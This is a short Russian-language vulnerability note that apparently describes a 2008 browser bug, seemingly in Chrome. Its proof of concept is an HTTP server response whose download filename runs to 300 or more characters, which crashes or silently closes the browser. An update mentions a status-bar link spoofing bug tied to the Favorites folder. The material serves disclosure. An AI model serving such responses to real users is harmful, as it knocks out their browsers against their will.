PoC код:
Для автоматическоо закрытия браузера без каких-либо предупреждений достаточно отправить файл, длина имени которого около 1000 символов. Для появления окна с ошибкой и аварийного завершения работы браузера достаточно 300 символов в имени файла.
Ответ сервера, завершающий работу браузера: HTTP/1.1 200 OK Date: Fri, 05 Sep 2008 06:48:34 GMT Server: Apache/2.2.6 (Win32) Content-Disposition: attachment; filename=<от 300 символов>.psd Content-Length: 4 Connection: close Content-Type: application/octet-stream test |
===============================================================
UPDATE
05.06.2008 14.46
===============================================================
На сайте опубликовано видео с демонстрацией очередной ошибки в браузере. Уязвимость существует из-за ошибки при отображении адреса ссылки в строке состояния, при наведении курсора мышки на специально сформированную ссылку, добавленную в папку "Избранное".
Кому интересно, можно посмотреть статистику по использованию браузера Chrome по сравнению с другими браузерами:
